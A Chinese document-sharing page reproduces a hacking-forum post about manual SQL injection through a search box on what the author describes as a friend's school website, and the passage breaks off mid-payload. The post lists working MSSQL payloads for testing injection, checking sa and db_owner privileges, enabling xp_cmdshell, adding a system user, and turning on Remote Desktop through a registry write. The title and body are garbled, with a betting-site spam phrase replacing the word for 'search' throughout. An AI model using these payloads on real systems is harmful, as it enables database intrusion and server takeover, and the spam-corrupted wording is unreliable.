- 1、本文档共8页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
总结有哪些信誉好的足球投注网站型手工注入的全过程(不同权限下的方法)
总结有哪些信誉好的足球投注网站型手工注入的全过程(不同权限下的方法)
D0000D发往论坛板块-------------------------------------------------------
No2 号板块 技术文章
D8888D贴子标题-------------------------------------------------------
总结有哪些信誉好的足球投注网站型手工注入的全过程(不同权限下的方法)
D8888D主贴内容-------------------------------------------------------
author:鸿鸿
本人是小菜,水平有限,但是为了论坛做贡献,还是自己写点原创的东西出来吧。希望大牛看了别笑就好了。。。。
=======================================================
前段时间朋友丢了一个站过来,说是他们学校的。叫我帮忙检测下。
于是看了下。用扫描器扫了下,没有啥可以上传利用的,发现后台,默认和万能密码无效,
无注入点,手工和工具试过了,防注入,COOKIES注入也不行。找不到程序源码,没办法分析。旁注 ?
整站是独立服务器,就一个站,旁注也没办法。难到要C段?好麻烦哦。丢给群里一些大牛看看,
都说搞不定(应该是没认真看吧。),我大受打击,但是我不放弃,再去看看先。
于是,发现了一个有哪些信誉好的足球投注网站框,直觉告诉我,这就是突破点,果然.....
前段时间的事情了,没办法截图。
整个过程做了简单的笔记,和搜集了一些手工注入的代码。凑合着看吧。
首先,简单的判断有哪些信誉好的足球投注网站型注入漏洞存在不存在的办法是先有哪些信誉好的足球投注网站,如果出错,说明90%存在这个漏洞。
a% and 1=1-- 正常
a% and 1=2-- 错误
有注入
由于网站过滤了 等等的。所以工具不行,要手工了。累人啊~~~
判断权限
a% and (select is_member(dbo))=1-- 返回正常则 sa
a% and (select is_member(db_owner))=1-- 返回正常则 DB
都不是那就只有一种可能啦,public,权限貌似很小。
也可以用另一种命令来判断权限
a% and 1=(Select IS_SRVROLEMEMBER(sysadmin));-- sa
a% and 1=(Select IS_MEMBER(db_owner));-- DB
======================================================================================
sa 的方法。直接建立系统帐号密码。登陆3389.
命令是
a%;exec master..xp_cmdshellnet user admins 123456 /add--
如果 xp_cmdshell 被关闭了。就来开启他。
EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;reconfigure
最后这个为1是开启.为0是关闭.
a% ;EXEC sp_configure show advanced options, 1;RECONFIGURE;EXECsp_configure xp_cmdshell, 1;RECONFIGURE--
如果不开3389
下面的命令。。
a%;exec master.dbo.xp_regwriteHKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Control\Terminal Server,fDenyTSConnections,REG_DWORD,0;--
======================================================================================
db 的方法
主要思路是列目录-差异备份 还有需要库名。想办法弄出来。
首先列目录
a% order by XX-- 自己猜 例如 12
然后
a% and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12--
找到字符类型的,能显示出来的 比如 5
《MSSQL手工注入目录查找辅助工具》这个自己百度去哈。。。
用 天阳的《MSSQL手工注入目录查找辅助工具》 生成列目录的代码 现在例如生成的是C盘的
然后
a% ;drop table t_tian6 create table t_tian6(fn nvarchar(4000),d int,f int) decla
您可能关注的文档
- 工程变更与签证控制程序.doc
- 工程师申请指南.doc
- 工程预埋,安装电气安装配管符号表示方法.doc
- 巧蒸馒头.doc
- 市场调查表范本.doc
- 布依族服饰与地理环境.doc
- 希尔伯特的23个世纪问题.doc
- 希尔伯特的23个数学问题.doc
- 带有会员结账单范本.doc
- 常用中药剂量.doc
- 2022年研究生自我鉴定(精选14篇) .pdf
- 中国整流元件项目投资可行性研究报告.docx
- 芡实维钙片行业深度研究报告.docx
- 2024重庆飞驶特人力资源管理有限公司大足分公司招聘派往邮亭镇铁路护路队员招聘1人笔试模拟试题及答案解析.docx
- 2024中国科学院福建物质结构研究所技术支撑中心招聘1人笔试模拟试题及答案解析.docx
- 2024浙江台州市黄岩区民政局招聘编外工作人员3人笔试备考试题及答案解析.docx
- 2024浙江武义县人民武装部综合保障中心招聘1人笔试模拟试题及答案解析.docx
- 2204广东韶关市中级人法院招募见习人员20人笔试模拟试题及答案解析.docx
- 2025中国地质科学院勘探技术研究所招聘应届毕业生(博士研究生岗位)8人笔试模拟试题及答案解析.docx
- 2024中国标准化研究院招聘中层干部1人笔试模拟试题及答案解析.docx
文档评论(0)